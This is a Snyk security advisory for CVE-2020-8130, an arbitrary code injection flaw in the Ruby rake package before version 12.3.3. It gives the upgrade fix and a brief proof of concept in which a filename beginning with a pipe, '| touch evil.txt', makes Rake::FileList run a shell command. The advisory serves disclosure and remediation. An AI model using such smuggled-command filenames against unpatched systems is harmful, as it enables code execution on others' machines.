Arbitrary Code Injection Affecting rake package, versions <12.3.3
Snyk CVSS
Attack Complexity
Low
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.09% (36th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-RUBY-RAKE-552000
- published 24 Feb 2020
- disclosed 24 Feb 2020
- credit Katsuhiko Yoshida
Introduced: 24 Feb 2020
CVE-2020-8130 Open this link in a new tabHow to fix?
Upgrade rake
to version 12.3.3 or higher.
Overview
rake is a Make-like program implemented in Ruby.
Affected versions of this package are vulnerable to Arbitrary Code Injection in Rake::FileList
when supplying a filename that begins with the pipe character |
.
PoC by Katsuhiko Yoshida
% ls -1
Gemfile
Gemfile.lock
poc_rake.rb
vendor
| touch evil.txt
% bundle exec ruby poc_rake.rb
["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"]
poc_rake.rb:6:list.egrep(/something/)
Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor
% ls -1
Gemfile
Gemfile.lock
evil.txt
poc_rake.rb
vendor
| touch evil.txt